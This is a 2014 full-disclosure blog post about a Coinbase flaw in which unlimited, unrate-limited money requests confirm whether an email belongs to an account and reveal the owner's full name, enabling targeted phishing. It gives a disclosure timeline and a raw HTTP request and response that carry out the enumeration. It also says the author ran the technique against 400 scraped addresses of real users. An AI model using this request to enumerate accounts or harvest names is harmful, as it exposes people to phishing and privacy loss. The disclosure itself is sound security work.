March 31, 2014 · websec logicflaw

Full Disclosure: Coinbase design allows for mass, targeted phishing of its users.

I'd like to start by saying that, I have tried my best to get these bugs fixed, and that I mean no harm by posting this, but rather wish to inform Coinbase users.

Table of Contents

1. History of Disclosue
2. Technical Details
3. Proof of Concept
4. Conclusion
5. Help get this fixed


I often come accross security issues which have been introduced "by design" and in many cases, developers of web applications refuse to fix these design flaws.

I feel strongly, that this is the case in my recent findings for Coinbase.

History of Disclosure to Coinbase

I spent hours trying to communicate my findings to Coinbase. Initially, Coinbase ignored me. My succession of emails to their official "[email protected]" domain were ignored until I posted that they weren't replying on reddit. Still as of now, my tweets to them over a months time were completely ignored: [1], [2], [3], [4], [5].

Timeline of disclosure:

#1 Feb 28th, 2014 - First contact made to "[email protected]".
#2 Mar 4th, 2014 - Twitter reminder
#3 Mar 4th, 2014 - Second contact made to "[email protected]" due to no reply.
#4 Mar 5th, 2014 - Twitter reminder [2]
#5 Mar 10th, 2014 - Twitter reminder [3]
#6 Mar 16, 2014 - Third contact made to "[email protected]".. still no reply.
#7 Mar 16, 2014 - Twitter reminder [4]
#8 Mar 24, 2014 - Reddit posts on /r/bitcoin and /r/coinbase.
#9 Mar 25, 2014 - Email reply received from Julian from Coinbase.
#10 Mar 26, 2014 - My response, explaining that Julian had missed the main part of the vulnerability disclosure.
#11 Mar 29, 2014 - Coinbase joins HackerOne bug bounty management platform.
#12 Mar 30, 2014 - I send another report via HackerOne to make sure they have acknowledged the full risks of the design flaw.
#13 Mar 31, 2014 - Confirmation as a "wont-fix" bug.

Technical Details

Here are the emails to and from Coinbase. I'll cut to the important parts of my report in this blog post, however feel free to read the entire report.

In my report, I claim that the ability to send unlimited money requests allows for an individual to determine whether or not a user is a part of Coinbase, as well as his/her first and last name listed on Coinbase.

1. Unlimited money request emails
2. Email Address / User enumeration on Coinbase
3. Information Disclosure of Coinbase Accounts (First and Last name)

The major security flaw, is not just the fact that full names are disclosed, but more so that there is no rate limiting or prevention of API abuse. This means that an attacker/spammer can iterate through hundreds and thousands of emails without being limited, and can potentially pick out the emails which are confirmed to be members of Coinbase.

Before you get the impression that this isn't a security flaw in itself, please let me explain.

Phishers can use this flaw for harm. I believe it is a security issue on Coinbase, which will merely assist mass, targeted phishing.

Once authenticated on Coinbase, all an attacker has to do to confirm validity of users is, send the following requests:

POST /transactions/request_money HTTP/1.1  
Host: coinbase.com  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0  
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-Token: xE9Hal1nexOgbEUaBiRWksgIE+hNzUMf/DDxz3JPVT8=  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: https://coinbase.com/transactions  
Content-Length: 213  
Cookie: [redacted]  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache

utf8=%E2%9C%93&authenticity_token=xE9Hal1nexOgbEUaBiRWksgIE%2BhNzUMf%2FDDxz3JPVT8%3D&transaction%5Bfrom%5D=[email_they_wish_to_validate]&transaction%5Bamount%5D=1&transaction_amount_converted=463.58&transaction%5Bnotes%5D=  

where [emailtheywishtovalidate] in the POST Data would be changed to the victims email, and the Cookie HTTP header would be filled out with the attackers cookie.

The response which Coinbase returns, will determine whether or not the requested email address is valid.

For a valid email address, it would look something like this:

HTTP/1.1 200 OK  
Server: cloudflare-nginx  
Date: Mon, 31 Mar 2014 14:55:33 GMT  
Content-Type: text/javascript; charset=utf-8  
Connection: keep-alive  
Cache-Control: max-age=0, private, must-revalidate  
Set-Cookie: request_method=POST; path=/; secure  
Set-Cookie: _coinbase=[redacted]  
Status: 200 OK  
Strict-Transport-Security: max-age=31536000  
Vary: Accept-Encoding  
X-Content-Type-Options: nosniff  
X-Frame-Options: SAMEORIGIN  
X-Rack-Cache: invalidate, pass  
X-Request-Id: ac56d4ca-7dc2-444b-9505-d2ed44bf4a7d  
X-Runtime: 0.589700  
X-Ua-Compatible: IE=Edge,chrome=1  
CF-RAY: 113d6373b13d04b6-SYD  
Content-Length: 3827

  ... [redacted]...  You requested money from John Citizen\n      \n      <\/a>\n    You requested money from John Citizen\n      \n      <\/a>\n    <\/td>\n    <td class=\"date\">Mar 31, 2014<\/td>\n    <td class=\"status\">\n   .... [redacted]

It's evident that we can see a name "John Citizen" (for example purposes), in the above response. This confirms two things for us:

  1. The email we requested is valid on Coinbase, as a user exists.
  2. The email we requested is associated with the name John Citizen on Coinbase.

Phew, now the spammer has taken scraped email addresses, and now has figured out that you're a valid user of coinbase AND now has your full name.

Proof Of Concept and Real Life Example

In order to demonstrate the nature of this security vulnerability, I thought it would be wise to display how a phisher would actually go about doing a campaign using techniques above:

1. Scrape email addresses from bitcoin related websites, and organise them into a large list.

Within 30 minutes, I was able to gather 400 unique email addresses, distinctively associated with Bitcoins

bitcoinemails

2. Test for emails which are actual Coinbase accounts, and extract their First and Last names, associated to the emails.

3. All sorts of panic happens.

This is what the attack in progress looks like:

exampleattack

Here is what your inbox looks like:

inbox

People start worrying:

twitter

4. You get valid results (Coinbase user enumeration).

valid valid1

5. People start thinking that Coinbase emails, are no longer legitimate/are unsolicited.

unwarranted

6. Some people think you're sending them Bitcoins.

sorryman


Conclusion

Seriously, Coinbase let me send 16 pages worth of Bitcoin requests.
rate

Reminds me of the auto-dialler from Simpsons, the AT-5000:
AT5000


Help get this bug fixed!

Coinbase didn't listen to me, but maybe they'll listen to you. The bitcoin community has the power to help fix issues like this. If you want to nudge Coinbase into considering fixing this, send a tweet: